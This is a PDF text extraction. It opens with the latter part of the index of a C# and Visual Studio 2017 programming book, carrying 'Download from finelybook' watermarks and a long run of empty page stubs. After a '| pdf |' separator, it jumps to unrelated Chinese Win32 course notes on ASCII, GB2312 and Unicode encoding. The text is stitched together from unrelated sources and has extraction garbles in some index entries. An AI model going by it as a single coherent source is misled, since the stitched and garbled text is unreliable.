multiple, 68–70, 93
void keyword, 63
returnMultipleValues method, 68
Reverse property (BasicCollection<T> class), 445
Run method, 530, 564
DailyRate project, 73, 90–92
Factorial project, 82
Running task status, 557
S
SaveAsync method, 739, 746, 749
Say method, 699
sbyte keyword, 215
scalability
asynchronicity and, 568
improving through multitasking, 525–526
scalable user interfaces, 618–627, 655
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
scope
bringing namespaces into, 15
methods
class, 72
local, 71
Download from finelybook [email protected]
1173
overview, 71
for statements, 123
ScreenPosition struct, 340–341, 342
property accessibility, 346
read-only properties, 345
write-only properties, 345
ScreenTips, 39
sealed classes, 306–307, 314
sealed keyword, 306–307, 313, 314
sealed methods, 307
searching with Cortana
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
Season enumeration
declaring, 210
enumeration variables, declaring, 210–211
security
Azure API, 729–730
pointers, 204–206
Segoe Print font, 649, 653
Select method, 482, 501
select operator, 489, 501
Select The Files To Reference dialog box, 400
selecting data, 482–484, 501
Selection project, 102–106
semantics, 35–36
SemaphoreSlim class, 595, 609
semicolon (;)
Download from finelybook [email protected]
1174
in enumeration variable declarations, 227
in method declarations, 63
statement termination, 35–36, 38
in structure variable declarations, 227
sentinel variables, 117
serializing method calls, 607
SerialPI method, 600–603
SerialTest method, 592
set accessor method
indexers, 368–369, 379
interface properties, 348–349
properties, 342–343
SetColor method, 300, 302, 351
SetLocation method, 299, 350
shallow copies, 185, 237–238
shared fields, 174–175
ShipOrder method, 460, 463
Shipper class, 460, 470–475
ShippingCompleteDelegate, 471
ShipProcessingComplete event, 472
short keyword, 215
short-circuiting Boolean operators, 97–98
ShowAsync method, 580
showBoolValue method, 46
showDoubleValue method, 46
showFloatValue method, 44
showIntValue method, 45
showResult method, 63–65
showStepsClick method, 125–126
at sign (@), 184
SignalAndWait method, 596
signatures, method, 273
Download from finelybook [email protected]
1175
simulators, testing UWP applications with, 628–630
single quotation marks (')
as delimiters, 111
in XML, 109
Single structure, 214
single-threaded applications, 525
Skip method, 491
Sleep method, 551
.sln file extension, 41
slowMethod method, 569–571
Solution Explorer pane, 6
solutions. See projects
Sort method, 407, 413
SortedDictionary<TKey, TValue> class, 420
SortedList<TKey, TValue> class, 412, 420–421
sources, event, 465
speech synthesis, 697–700
speechRecognitionResult object, 691
SpeechSynthesizer class, 699
spinning, 586
SpinWait method, 586
Split method, 589, 693
splitting strings, 589, 693
SQL (Structured Query Language), 480, 710
Sqrt method, 171, 173–174
square brackets ([ ]), 54, 229, 252
Square class, 298–300, 316
square roots, calculating, 171
stack
boxing and, 199–200, 207
purpose of, 196–198
storing data on, 198–199
Download from finelybook [email protected]
1176
unboxing, 200–201
Stack<T> class, 412, 417–418
StackOverflowException, 344
Start Debugging command (Debug menu), 34, 70
Start method, 530, 564
Start Without Debugging command (Debug menu), 13, 34, 90
StartCheckoutProcessing method, 462
StartEngine method, 279
for statements
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
statements. See also keywords
break, 109, 124
checked/unchecked, 145
continue, 124
defined, 35–36
do
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
finally, 154–155, 156, 318, 322
for
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
Download from finelybook [email protected]
1177
scope, 123
syntax, 121–122
foreach
arrays, iterating through, 234–235, 252
canceling, 557–558
collections, iterating through, 413, 415, 417–418, 419, 433, 448
goto, 109
if
blocks, 100–101
cascading, 101–106
common errors in, 100
if…else, 203
syntax, 99–100, 112–113
when to use, 99
lock, 332–333, 593, 609
quick references, 112–113, 132
return, 63–64, 93, 109
switch, 203–204
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
syntax of, 35–36
throw
catch handler, 151–153
example of, 149–153, 156
throw exceptions, 153–154
try/catch blocks
example of, 156
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
Download from finelybook [email protected]
1178
when keyword, 138–142
try/finally blocks, 318, 322
using, 15, 17, 335
garbage collection, 323–324
static, 176–178
while
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
static fields
accessing, 181
creating, 175, 181
shared, 174–175
static keyword, 522
static methods, 173–174, 181
static operators, 505
static properties, 344
static using statements, 176–178
StaticResource keyword, 647
stdarg.h file, 258
stepping through
methods, 78–81, 94
statements, 127–131
StopEngine method, 279
StopFolding method, 464
StopWatch object, 534
StorageFile class, 581
String class, 184
Download from finelybook [email protected]
1179
string data type, 40
string keyword, 184, 215
String.IsNullOrEmpty method, 376
strings, 184
concatenating, 47–48
converting to integers, 47, 59
converting values to, 365, 368
determining if empty, 376
determining if null, 376
interpolation, 48
splitting, 589, 693
struct keyword, 216, 227
StructsAndEnums project, 212–214, 220–223, 224–225
structure variables
copying, 223
declaring, 218, 227
initializing, 227
nullable, 218
Structured Query Language (SQL), 480, 710
structures, 214
classes compared to, 217–218
common types, 214–215
comparing operators in, 509–510
Date, 220–221
declaring, 216, 227
indexers in, 379
initializing, 219–223
IntBits, 367–368
Name, 373
operators and, 216
PhoneNumber, 373–375
quick reference, 227
Download from finelybook [email protected]
1180
ScreenPosition, 340–341, 342
property accessibility, 346
read-only properties, 345
write-only properties, 345
StructsAndEnums project, 224–225
structure variables
copying, 223
declaring, 227
initializing, 227
nullable, 218
System.Int32, 398
Time
declaring, 216
initializing, 219–220
structure variables, declaring, 218
variable declarations, 218
Windows Runtime compatibility, 226
Wrapper, 370–371
styles, applying to user interfaces, 646–654, 655
subscribing to events, 466–467, 476
subtraction (-) operator, 47
subtractValues method, 52
subtrees, binary, 388
Sum method, 260–263, 264
sumTotal variable, 262
SuppressFinalize method, 331
Swap<T> method, 399
switch statement, 203–204
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
Download from finelybook [email protected]
1181
SwitchStatement project, 109–112
symmetric operators, 506–507, 519
synchronization primitives for coordinating tasks, 593–594
synchronizing
concurrent access to data
concurrent collection classes, 597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 593–594, 596–597
thread-safe data access, implementing, 598–607
tasks, 531
threads, 594, 609
Synchronous I/O anti-pattern, 568
System.Array class. See arrays
System.Collections namespace, 412
System.Collections.Concurrent namespace, 412
System.Collections.Generic namespace, 386–387, 411
System.Collections.IEnumerable interface, 435, 441–443
System.Collections.IEnumerator interface, 436
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
System.Int32 structure, 214, 398
System.Int64 structure, 214
System.Linq namespace, 489
System.Numerics namespace, 511
System.Object class, 199, 270, 383. See also objects
System.Random class, 231
System.Single structure, 214
System.String class, 184
System.Threading namespace, 528, 594
System.Threading.Tasks namespace, 527
System.ValueTuple structure, 214
Download from finelybook [email protected]
1182
System.ValueType abstract class, 269
System.ValueType package, 173
T
Take method, 491
TakeOff method, 279
Task class, 528–529. See also Task objects
Task Manager
CPU utilization, monitoring, 536–538
launching, 536
Task objects. See tasks
Task<TResult> class, 578
TaskContinuationOptions enumeration, 530–531
TaskCreationOptions object, 530
tasks
abstracting, 545–549
asynchronous methods and, 582–583
canceling
cancellation tokens, 551–552
cooperative cancellation, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted
continuations with, 563–564
Faulted task status, 557
Parallel class
abstracting classes with, 545–549
ForEach<T> method, 546, 565
Invoke method, 546, 565
Download from finelybook [email protected]
1183
For method, 545–546, 565
when to use, 549–551
parallelism
implementing, 531–538, 565
Parallel class, 545–551
quick reference, 564–566
running, 530, 564
synchronization primitives for coordinating tasks, 593–594
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
Tasks namespace, 527
TemperatureMonitor class, 466–467
templates
ASP.NET Web API, 722
Blank App, 615–617, 655
terminating while statements, 117
TestHello project, 3–14
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
namespaces
assemblies and, 17
bringing into scope, 15
defining classes in, 14–15
longhand names, 16
TestIfTrue method, 586
testing
Cortana searches, 695–696
for null values, 190–191
Download from finelybook [email protected]
1184
Tree<TItem>396–399
UWP (Universal Windows Platform) applications, 628–630
TestReader class, 321–322
TextBlock control, 21–24
in scalable user interface, 620–622, 625–626
styles applied to, 649–651
TextBox control, 622–624, 625–626, 661, 664–665
TextReader class, 119
ThenBy method, 486
ThenByDescending method, 486
this keyword, 284, 288, 368, 378
Thread class, 528
thread safety
Dispose method and, 332–333
thread-safe data access, 598–607
Threading namespace, 528, 594
ThreadPool class, 528–529
threads, 525. See also tasks
concurrent, 605
defined, 572
single-threaded applications, 525
suspending execution of, 531
synchronizing, 594, 609
Thread class, 528
thread safety
Dispose method and, 332–333
thread-safe data access, 598–607
Threading namespace, 528, 594
ThreadPool class, 528–529
Thread.Sleep method, 551
throw exceptions, 153–154
throw statement
Download from finelybook [email protected]
1185
catch handler, 151–153
example of, 149–153, 156
throw exceptions, 153–154
ThrowIfCancellationRequested method, 559, 560
throwing exceptions
catch handler, 151–153
example of, 156
finally blocks, 154–155
throw exceptions, 153–154
throw statement, 149–153
tilde (~)
destructor declarations, 317, 335
NOT (~) operator, 365
Time structure
declaring, 216
initializing, 219–220
structure variables, declaring, 218
ToArray method, 427, 497, 500, 502
ToChar method, 127
TODO comments, 167
tokens, cancellation, 551–552, 590
ToList method, 497, 500, 502
ToString method, 45, 59, 67, 210–211, 214, 221, 245, 274, 365, 378, 512
Tree<TItem> class
creating, 392–396
enumerator, defining, 445–447
querying data in, 491–497
testing, 396–399
TreeEnumerator class, 437–439
trees, binary. See binary trees
TResult parameter (Select method), 483
Triangle class, 356–357
Download from finelybook [email protected]
1186
troubleshooting. See exceptions
try statement, 134–135
try/catch blocks
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
when keyword, 138–142
try/finally blocks, 318, 322
TSource parameter (Select method), 483
tuples, 173, 214
defined, 68
returning from methods, 68–70, 93
two-way data binding, 664–665, 700
types. See value types
type-safe classes. See generics
typeSelectionChanged method, 43
U
uint data type, 364
uint keyword, 215
ulong keyword, 215
unary operators, 56, 98, 504
unassigned local variables, 40
unboxing, 200–201
unchecked integer arithmetic, 144–145
unchecked keyword, 144–145
expressions, 146–148
statements, 145
underscore (_), 38, 364
unhandled exceptions, 135–136
Union method, 491
Download from finelybook [email protected]
1187
UnionWith method, 421
Universal Windows Platform applications. See UWP (Universal Windows
Platform) applications
unsafe code, pointers and, 204–206
unsafe keyword, 205–206
unsigned int (uint) data type, 364
unsubscribing from events, 467, 476
updating
databases, 733–741
user interfaces, 746–749
user experience (UX), 612
user interfaces, 611–612. See also data binding
adapting with Visual State Manager, 639–645
displaying data in, 658–664
events, 468–469
modifying data with, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
quick reference, 655
scalable, 618–627, 655
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
styles applied to, 646–654, 655
tabular layout, 630–639
updating with REST web services, 746–749, 751
user-defined conversion operators, 518
ushort keyword, 215
using statements, 15, 17
garbage collection, 323–324, 335
Download from finelybook [email protected]
1188
static, 176–178
Util class, 285
Min method, 256–257
Sum method, 260–263, 264
UWP (Universal Windows Platform) applications, 50, 226. See also
asynchronous methods
building with Blank App template, 615–617, 655
Cortana searches
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
voice activation, 691–695
creating in Visual Studio 2017, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
data binding
with ComboBox control, 669–671
displaying data with, 658–664
INotifyPropertyChanged interface, 665–668, 700
modifying data with, 664–669
nameof operator, 668–669
quick reference, 700–701
two-way, 664–665, 700
features of, 612–615
life cycle of, 613
Download from finelybook [email protected]
1189
multitasking
advantages of, 525–526
multicore processors, 526–527
.NET Framework and, 527
MVVM (Model-View-ViewModel) pattern, 657–658
online resources, 612, 615
remote databases, accessing, 703
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
error reporting, 742–746
quick reference, 750–751
REST web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
tasks
abstracting, 545–549
cancel, 545–549
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
Parallel class, 545–551
parallelism, 531–538, 545–551, 565
quick reference, 564–566
Download from finelybook [email protected]
1190
running, 530, 564
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
testing, 628–630
user interfaces, 611–612
adapting with Visual State Manager, 639–645
displaying data in, 658–664
modifying data with, 664–669
quick reference, 655
scalable, 618–627, 655
styles applied to, 646–654, 655
tabular layout, 630–639
ViewModel
adding commands to, 675–685
creating, 671–675
vocal responses to voice commands, 697–700
UX (user experience), 612
V
ValidateCustomer method, 735, 739, 743–744, 748
validPercentage method, 97
Value enumeration, 241
value keyword, 369
Value method, 186–187
Value property, 192
value types
Action, 529, 676
arithmetic operators and, 47–49
in arrays, 249–251
Download from finelybook [email protected]
1191
binary
binary notation, 364
displaying, 365
hexadecimal notation, 364
manipulating, 365–366
obo prefix, 364
operators for, 365–366
storing, 364
boxing, 199–200, 207
casting, 202, 207
InvalidCastException, 201
is operator, 202
as operator, 202–203
switch statement, 203–204
copying, 183–189, 206, 216
double, converting to int, 517
enumerations
declaring, 210, 227
enumeration variables, 210–211, 227
literal values, 211
nullable, 210
overview, 209
StructsAndEnums project, 212–214
underlying types, 212
Func, 676
int
arithmetic operators and, 49–54
in array arguments, 256–257
checked versus unchecked arithmetic, 144–148
converting double type to, 517
converting strings to, 47, 59
converting to double, 517
Download from finelybook [email protected]
1192
minimum/maximum value of, 144
overview, 40
in parameter arrays, 257–258
uint (unsigned int), 364
null
null-conditional (?) operator, 190–191, 207
overview, 189–190
testing for, 190–191
nullable, 210
overview, 191–192
properties of, 192–193
numeric
displaying when last updated, 41–46
infinite values, 49
specifying, 39–40
out parameters, 194–195, 207
primitive
displaying values of, 41–46
table of, 40
quick reference, 206–207, 227
ref parameters
creating, 193–194, 207
overview, 193
Parameters project, 195–196
reference types compared to, 183–185
structures, 214
classes compared to, 217–218
common types, 214–215
declaring, 216, 227
initializing, 219–223
operators and, 216
StructsAndEnums project, 224–225
Download from finelybook [email protected]
1193
structure variables, 223, 227
variable declarations, 218
Windows Runtime compatibility, 226
uint, 364
unboxing, 200–201
Windows Runtime compatibility, 311–313
values. See also value types
assigning to variables, 39, 59
returning from methods
method calls, 68–70
method declarations, 63–64, 93
multiple return values, 68–70, 93
void keyword, 63
unassigned, 40
ValueTuple package, installing, 70
ValueTuple structure, 214
ValueType abstract class, 269
ValueType package, 173
var keyword, 58, 62, 179, 484
varargs macros, 258
variables. See also values
array
declaring, 229–230
instantiating, 230–231
assigning values to, 39, 59
Boolean, 95–96, 112
currentCustomer, 673
declaring, 38–39, 59
decrementing, 56–57, 59, 116
defined, 37–38
enumeration variables
assigning to values, 227
Download from finelybook [email protected]
1194
declaring, 210–211, 227
operators and, 211
implicitly typed local, 57–58
incrementing, 56–57, 59, 116
initializing, 189–190, 441
naming, 38
null
null-conditional (?) operator, 190–191
overview, 189–190
testing for, 190–191
nullable
overview, 191–192
properties of, 192–193
pointers, 204–206
quick reference, 59
randomCardSelector, 242
sentinel, 117
structure
copying, 223
declaring, 218, 227
initializing, 227
nullable, 218
sumTotal, 262
unassigned local, 40
variadic methods, 256
variance, generic interfaces and, 402–404
VCD (voice-command definition) files, 687–690
Vehicle class, 279
Vehicles project, 278–283
ViewModel object, 734–740
adding commands to, 675–685
ICommand interface, 675–678, 701
Download from finelybook [email protected]
1195
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
adding/editing data with, 731
creating, 671–675
error reporting, 743–746
MVVM (Model-View-ViewModel) pattern, 657–658
UI updates, 746–748
virtual keyword, 275, 288, 313
virtual machines, 226
virtual methods
declaring, 274–275
polymorphism and, 277, 288
Visual State Manager, adapting user interfaces with, 639–645
Visual Studio 2017
Code and Text Editor window, 6
console applications
creating in Visual Studio 2017, 3–14, 34
defined, 3
namespaces, 14–17
graphical applications, creating, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
WPF App template, 33
Implement Interface Wizard, 292
quick reference, 34
Download from finelybook [email protected]
1196
Solution Explorer pane, 6
VMs (virtual machines), 226
vocal responses to voice commands, 697–700
voice activation, 691–695
registration of voice commands, 690–691
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice-command definition (VCD) files, 687–690
VoiceCommandActivatedEventArgs object, 691
VoiceCommandDefinitionManager, 691
void keyword, 63
W
Wait method, 531, 564
WaitAll method, 531, 565
WaitAny method, 531
waiting for tasks, 531, 564–565
WaitingToRun task status, 556
WalkTree method, 396
when keyword, 138–142
where keyword, 401, 408, 489, 501
Where method, 484–485, 501
while statements
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
WhileStatement project, 118–121
Download from finelybook [email protected]
1197
white space, 36
widening conversions, 517
Windows applications, indexers in, 372–378
Windows Phone SDK 8.0, 611
WinRT (Windows Runtime), 611
asynchronous methods and, 580–582
compatibility with, 226, 311–313
WithCancellation method, 590, 608
wizards
Add Scaffold, 718
Entity Data Model, 712–716
Extract Method, 78
Generate Method Stub, 74–77, 93
Implement Interface, 292
Publish Web, 724
WPF App template, 33
WrappedInt class, 187
Wrapper structure, 370–371
Wrapper<T> class, 403
Write method, 76, 582
WriteableBitmap object, 532–534, 582
WriteAsync method, 582
writeFee method, 77
WriteLine method, 40, 73, 214, 255–256, 260
write-only indexers, 369
write-only properties, 345, 360
X-Y-Z
XAML (Extensible Application Markup Language), 20. See also user
interfaces
App.xaml.cs file, 28–30
Download from finelybook [email protected]
1198
MainPage.xaml files, 27–28, 639
namespace declarations, 616
XML (Extensible Markup Language), special characters in, 109
XOR (^) operator, 366
yield keyword, 444, 448
Download from finelybook [email protected]
1199
Code Snippets
Many titles include programming code or configuration examples. To
optimize the presentation of these elements, view the eBook in single-
column, landscape mode and adjust the font size to the smallest setting. In
addition to presenting code and configurations in the reflowable text format,
we have included images of the code that mimic the presentation found in the
print book; therefore, where the reflowable format may compromise the
presentation of the code listing, you will see a “Click here to view code
image” link. Click the link to view the print-fidelity code image. To return to
the previous page viewed, click the Back button on your device or app.
Download from finelybook [email protected]
1200
Download from finelybook [email protected]
1201
Download from finelybook [email protected]
1202
Download from finelybook [email protected]
1203
Download from finelybook [email protected]
1204
Download from finelybook [email protected]
1205
Download from finelybook [email protected]
1206
Download from finelybook [email protected]
1207
Download from finelybook [email protected]
1208
Download from finelybook [email protected]
1209
Download from finelybook [email protected]
1210
Download from finelybook [email protected]
1211
Download from finelybook [email protected]
1212
Download from finelybook [email protected]
1213
Download from finelybook [email protected]
1214
Download from finelybook [email protected]
1215
Download from finelybook [email protected]
1216
Download from finelybook [email protected]
1217
Download from finelybook [email protected]
1218
Download from finelybook [email protected]
1219
Download from finelybook [email protected]
1220
Download from finelybook [email protected]
1221
Download from finelybook [email protected]
1222
Download from finelybook [email protected]
1223
Download from finelybook [email protected]
1224
Download from finelybook [email protected]
1225
Download from finelybook [email protected]
1226
Download from finelybook [email protected]
1227
Download from finelybook [email protected]
1228
Download from finelybook [email protected]
1229
Download from finelybook [email protected]
1230
Download from finelybook [email protected]
1231
Download from finelybook [email protected]
1232
Download from finelybook [email protected]
1233
Download from finelybook [email protected]
1234
Download from finelybook [email protected]
1235
Download from finelybook [email protected]
1236
Download from finelybook [email protected]
1237
Download from finelybook [email protected]
1238
Download from finelybook [email protected]
1239
Download from finelybook [email protected]
1240
Download from finelybook [email protected]
1241
Download from finelybook [email protected]
1242
Download from finelybook [email protected]
1243
Download from finelybook [email protected]
1244
Download from finelybook [email protected]
1245
Download from finelybook [email protected]
1246
Download from finelybook [email protected]
1247
Download from finelybook [email protected]
1248
Download from finelybook [email protected]
1249
Download from finelybook [email protected]
1250
Download from finelybook [email protected]
1251
Download from finelybook [email protected]
1252
Download from finelybook [email protected]
1253
Download from finelybook [email protected]
1254
Download from finelybook [email protected]
1255
Download from finelybook [email protected]
1256
Download from finelybook [email protected]
1257
Download from finelybook [email protected]
1258
Download from finelybook [email protected]
1259
Download from finelybook [email protected]
1260
Download from finelybook [email protected]
1261
Download from finelybook [email protected]
1262
Download from finelybook [email protected]
1263
Download from finelybook [email protected]
1264
Download from finelybook [email protected]
1265
Download from finelybook [email protected]
1266
Download from finelybook [email protected]
1267
Download from finelybook [email protected]
1268
Download from finelybook [email protected]
1269
Download from finelybook [email protected]
1270
Download from finelybook [email protected]
1271
Download from finelybook [email protected]
1272
Download from finelybook [email protected]
1273
Download from finelybook [email protected]
1274
Download from finelybook [email protected]
1275
Download from finelybook [email protected]
1276
Download from finelybook [email protected]
1277
Download from finelybook [email protected]
1278
Download from finelybook [email protected]
1279
Download from finelybook [email protected]
1280
Download from finelybook [email protected]
1281
Download from finelybook [email protected]
1282
Download from finelybook [email protected]
1283
Download from finelybook [email protected]
1284
Download from finelybook [email protected]
1285
Download from finelybook [email protected]
1286
Download from finelybook [email protected]
1287
Download from finelybook [email protected]
1288
Download from finelybook [email protected]
1289
Download from finelybook [email protected]
1290
Download from finelybook [email protected]
1291
Download from finelybook [email protected]
1292
Download from finelybook [email protected]
1293
Download from finelybook [email protected]
1294
Download from finelybook [email protected]
1295
Download from finelybook [email protected]
1296
Download from finelybook [email protected]
1297
Download from finelybook [email protected]
1298
Download from finelybook [email protected]
1299
Download from finelybook [email protected]
1300
Download from finelybook [email protected]
1301
Download from finelybook [email protected]
1302
Download from finelybook [email protected]
1303
Download from finelybook [email protected]
1304
Download from finelybook [email protected]
1305
Download from finelybook [email protected]
1306
Download from finelybook [email protected]
1307
Download from finelybook [email protected]
1308
Download from finelybook [email protected]
1309
Download from finelybook [email protected]
1310
Download from finelybook [email protected]
1311
Download from finelybook [email protected]
1312
Download from finelybook [email protected]
1313
Download from finelybook [email protected]
1314
Download from finelybook [email protected]
1315
Download from finelybook [email protected]
1316
Download from finelybook [email protected]
1317
Download from finelybook [email protected]
1318
Download from finelybook [email protected]
1319
Download from finelybook [email protected]
1320
Download from finelybook [email protected]
1321
Download from finelybook [email protected]
1322
Download from finelybook [email protected]
1323
Download from finelybook [email protected]
1324
Download from finelybook [email protected]
1325
Download from finelybook [email protected]
1326
Download from finelybook [email protected]
1327
Download from finelybook [email protected]
1328
Download from finelybook [email protected]
1329
Download from finelybook [email protected]
1330
Download from finelybook [email protected]
1331
Download from finelybook [email protected]
1332
Download from finelybook [email protected]
1333
Download from finelybook [email protected]
1334
Download from finelybook [email protected]
1335
Download from finelybook [email protected]
1336
Download from finelybook [email protected]
1337
Download from finelybook [email protected]
1338
Download from finelybook [email protected]
1339
Download from finelybook [email protected]
1340
Download from finelybook [email protected]
1341
Download from finelybook [email protected]
1342
Download from finelybook [email protected]
1343
Download from finelybook [email protected]
1344
Download from finelybook [email protected]
1345
Download from finelybook [email protected]
1346
Download from finelybook [email protected]
1347
Download from finelybook [email protected]
1348
Download from finelybook [email protected]
1349
Download from finelybook [email protected]
1350
Download from finelybook [email protected]
1351
Download from finelybook [email protected]
1352
Download from finelybook [email protected]
1353
Download from finelybook [email protected]
1354
Download from finelybook [email protected]
1355
Download from finelybook [email protected]
1356
Download from finelybook [email protected]
1357
Download from finelybook [email protected]
1358
Download from finelybook [email protected]
1359
Download from finelybook [email protected]
1360
Download from finelybook [email protected]
1361
Download from finelybook [email protected]
1362
Download from finelybook [email protected]
1363
Download from finelybook [email protected]
1364
Download from finelybook [email protected]
1365
Download from finelybook [email protected]
1366
Download from finelybook [email protected]
1367
Download from finelybook [email protected]
1368
Download from finelybook [email protected]
1369
Download from finelybook [email protected]
1370
Download from finelybook [email protected]
1371
Download from finelybook [email protected]
1372
Download from finelybook [email protected]
1373
Download from finelybook [email protected]
1374
Download from finelybook [email protected]
1375
Download from finelybook [email protected]
1376
Download from finelybook [email protected]
1377
Download from finelybook [email protected]
1378
Download from finelybook [email protected]
1379
Download from finelybook [email protected]
1380
Download from finelybook [email protected]
1381
Download from finelybook [email protected]
1382
Download from finelybook [email protected]
1383
Download from finelybook [email protected]
1384
Download from finelybook [email protected]
1385
Download from finelybook [email protected]
1386
Download from finelybook [email protected]
1387
Download from finelybook [email protected]
1388
Download from finelybook [email protected]
1389
Download from finelybook [email protected]
1390
Download from finelybook [email protected]
1391
Download from finelybook [email protected]
1392
Download from finelybook [email protected]
1393
Download from finelybook [email protected]
1394
Download from finelybook [email protected]
1395
Download from finelybook [email protected]
1396
Download from finelybook [email protected]
1397
Download from finelybook [email protected]
1398
Download from finelybook [email protected]
1399
Download from finelybook [email protected]
1400
Download from finelybook [email protected]
1401
Download from finelybook [email protected]
1402
Download from finelybook [email protected]
1403
Download from finelybook [email protected]
1404
Download from finelybook [email protected]
1405
Download from finelybook [email protected]
1406
Download from finelybook [email protected]
1407
Download from finelybook [email protected]
1408
Download from finelybook [email protected]
1409
Download from finelybook [email protected]
1410
Download from finelybook [email protected]
1411
Download from finelybook [email protected]
1412
Download from finelybook [email protected]
1413
Download from finelybook [email protected]
1414
Download from finelybook [email protected]
1415
Download from finelybook [email protected]
1416
Download from finelybook [email protected]
1417
Download from finelybook [email protected]
1418
Download from finelybook [email protected]
1419
Download from finelybook [email protected]
1420
Download from finelybook [email protected]
1421
Download from finelybook [email protected]
1422
Download from finelybook [email protected]
1423
Download from finelybook [email protected]
1424
Download from finelybook [email protected]
1425
Download from finelybook [email protected]
1426
Download from finelybook [email protected]
1427
Download from finelybook [email protected]
1428
Download from finelybook [email protected]
1429
Download from finelybook [email protected]
1430
Download from finelybook [email protected]
1431
Download from finelybook [email protected]
1432
Download from finelybook [email protected]
1433
Download from finelybook [email protected]
1434
Download from finelybook [email protected]
1435
Download from finelybook [email protected]
1436
Download from finelybook [email protected]
1437
Download from finelybook [email protected]
1438
Download from finelybook [email protected]
1439
Download from finelybook [email protected]
1440
Download from finelybook [email protected]
1441
Download from finelybook [email protected]
1442
Download from finelybook [email protected]
1443
Download from finelybook [email protected]
1444
Download from finelybook [email protected]
1445
Download from finelybook [email protected]
1446
Download from finelybook [email protected]
1447
Download from finelybook [email protected]
1448
Download from finelybook [email protected]
1449
Download from finelybook [email protected]
1450
Download from finelybook [email protected]
1451
Download from finelybook [email protected]
1452
Download from finelybook [email protected]
1453
Download from finelybook [email protected]
1454
Download from finelybook [email protected]
1455
Download from finelybook [email protected]
1456
Download from finelybook [email protected]
1457
Download from finelybook [email protected]
1458
Download from finelybook [email protected]
1459
Download from finelybook [email protected]
1460
Download from finelybook [email protected]
1461
Download from finelybook [email protected]
1462
Download from finelybook [email protected]
1463
Download from finelybook [email protected]
1464
Download from finelybook [email protected]
1465
Download from finelybook [email protected]
1466
Download from finelybook [email protected]
1467
Download from finelybook [email protected]
1468
Download from finelybook [email protected]
1469
Download from finelybook [email protected]
1470
Download from finelybook [email protected]
1471
Download from finelybook [email protected]
1472
Download from finelybook [email protected]
1473
Download from finelybook [email protected]
1474
Download from finelybook [email protected]
1475
Download from finelybook [email protected]
1476
Download from finelybook [email protected]
1477 | pdf |
滴水逆向课程笔记 – Win32
Win32课程介绍 – 1
1 Win32课程介绍
很多人对Win32的认识是错误的,他们认为Win32就是画界面,都已经学MFC了还学什么Win32?
Win32不是用来画界面的,如果你以后要在Windows写好程序,是必须要学Win32的;摆正学习态度。
滴水逆向课程笔记 – Win32
字符编码 – 2
2 字符编码
我们会经常接触到各种各样的字符编码,本章节就来讲解一下常见的编码。
2.1 原始的ASCII编码
计算机是由美国人发明的,所以一开始设计编码的时候只会考虑到自身的元素,采用ASCII编码完全可以满足其
需求,但是计算机普及之后,很多国家的文字是象形文字,所以我们使用ASCII编码是无法满足需求的。
2.2 ASCII编码的拓展:GB2312或GB2312-80
由于ASCII编码无法满足需求,所以在其基础上进行扩展,大家都知道ASCII编码只有0-127,用十六进制表示是
0x00-0x7F,而之后的0x80-0xFF在标准的ASCII编码中是不存在的,所以就出现了我们所说的ASCII编码的扩展。
滴水逆向课程笔记 – Win32
字符编码 – 3
但是这样能满足中文、韩文这种象形文字吗?其实并不可以,如上这张表实际上使用频率很低,而这时候
GB2312编码(该编码与GBK没有什么本质区别,无非就是收录的汉字和图形符号的区别:GB2312标准共收录
6763个汉字,GBK共收入21886个汉字和图形符号)考虑到这个因素就占用了这张表,那么是怎么占用的呢?
其本质就是创建两张如上图所示的表,然后进行拼接,两个字节加起来就组成一个新的中文文字。
例如:中国的“中”这个字,就是0xD0和0xD6拼接起来的。这种编码是否存在问题?这是必然的,我们已经知道
了该编码的设计原理,假设我们将“中国”这两个字发给国外的朋友,他的电脑上并没有该编码表,所以解析出
来的则不会是汉字,而会出现大家所熟知的“乱码”。
2.3 Unicode编码
为了解决ASCII的缺陷,Unicode编码就诞生了,那么Unicode是如何解决这一问题的呢?
